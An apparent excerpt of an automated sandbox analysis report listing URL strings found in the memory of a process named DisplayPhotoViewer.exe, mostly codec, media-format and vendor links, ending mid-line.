                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://umezawa.dyndns.info/archive/utvideo;;;RGB;4:4:4
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://umezawa.dyndns.info/archive/utvideo;;;RGBA;4:4:4:4
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://umezawa.dyndns.info/archive/utvideo;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://umezawa.dyndns.info/archive/utvideo;;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://video.google.com/playerdownload.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://wiki.hydrogenaudio.org/index.php?title=Recommended_Ogg_Vorbis
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://winace.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://winamp.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://winzip.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://world.casio.com/;Casio
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.3gpp.org/;3GPP
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.3gpp2.org/;3GPP2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.3ivx.com/download/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.3ivx.com/download/;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.adobe.fr/products/encore/;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/pdfaid:partpdfaid:conformance
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3232657595.000000006B2DB000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/appletv/;Apple
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/iphone/;Apple
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/itunes/;AES
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/itunes/;Apple
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;422
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;422;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;4444
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;4444;;;4:4:4
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;;4:4:4
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;RGB
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;YUV;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Adobe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Base
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Facebook
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;High;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;ISML
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;ISO
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;JVT
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;LT;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Mobile
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Narrow
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Normal;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;PIFF
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Proxy;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;QuickTime
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Quicktime
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;RAW
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;RAW;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apple.com/quicktime/download/standalone.html;Wide
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.array.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.array.com;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.autodesk.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.avs.org.cn/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.bbc.co.uk/rd/projects/dirac/index.shtml;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.bitjazz.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.blender3d.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.chem.nott.ac.uk/flc.html;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.chiariglione.org/mpeg/technologies/mp04-sls/index.htm;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cineform.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cineform.com/products/ConnectHD.htm
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cineform.com/products/ConnectHD.htm;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cineform.com/products/ConnectHD.htm;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cinepak.com/text.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cinepak.com/text.html;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cpcweb.com/Captioning/cap_software.htm;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cyberlink.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cyberlink.com;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.digicine.com/PROTO-ASDCP-AM-20040311#
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.digicine.com/PROTO-ASDCP-AM-20040311#http://www.smpte-ra.org/schemas/429-9/2007/AMAssetMa
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.digicine.com/PROTO-ASDCP-CPL-20040511#
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.digicine.com/PROTO-ASDCP-PKL-20040311#
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.digicine.com/PROTO-ASDCP-PKL-20040311#http://www.smpte-ra.org/schemas/429-8/2007/PKLhttp:
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.digitalvoodoo.net/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.divx.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.divx.com;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.divxity.com/download/ap4v1-702.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.divxity.com/download/ap4v1-702.exe;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.dolby.com/consumer/technology/trueHD.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.dts.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.ebu.ch/metadata/schemas/EBUCore/20140318/EBU_CORE_20140318.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexrgb.htm
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGB
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGB;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGB;;4
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGB;;8
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexrgb.htm;;;RGBA
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexyuv.htm
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexyuv.htm;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV;4:1:1
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fourcc.org/indexyuv.htm;;;YUV;4:2:2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fraps.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.fraps.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.free-codecs.com/download/Alparysoft_Lossless_Video_Codec.htm
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.free-codecs.com/download/Alparysoft_Lossless_Video_Codec.htm;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.geovision.com.tw/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.gotomeeting.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.gotomeeting.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.ii.uj.edu.pl/~jezabek/blox/blox-0.1.0b.zip
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.ii.uj.edu.pl/~jezabek/blox/blox-0.1.0b.zip;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.iis.fraunhofer.de/amm/index.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.iis.fraunhofer.de/amm/index.html;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.iis.fraunhofer.de/amm/index.html;;Version
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.00000000029F4000.00000004.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.indyproject.org/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.intel.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.isky.co.kr/html/cs/download.jsp
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.iso.org/;JPEG
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.iso.org/;Motion
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.itu.int
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.itu.int/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.ligos.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.linek.sk/mlc/;;;;;;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.loc.gov/mix/v20
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.loc.gov/mix/v20xmlns:mixhttp://www.loc.gov/mix/v20
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.loc.gov/standards/mix/mix20/mix20.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.loc.gov/standards/mix/mix20/mix20.xsdmix:numeratormix:denominatormix:Extension
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.loronix.com/products/video_clips/wavecodec.asp
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.loronix.com/products/video_clips/wavecodec.asp;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.lossless-audio.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.lossless-audio.com/;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.lucasarts.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.lucasarts.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.macromedia.com/go/getflashplayer
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.matrox.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.meridian-audio.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.monkeysaudio.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.monkeysaudio.com/;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.morgan-multimedia.com/JPEG
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.msoftware.co.nz
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.musepack.net;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.nellymoser.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.nero.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.nero.com;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.nerodigital.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.nerodigital.com;Nero
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp118
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2952270350.000000000C2FE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2622099264.000000000A539000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2620711515.000000000A539000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951583851.000000000A727000.00000004.00000020.00020000.00000000.sdmp, 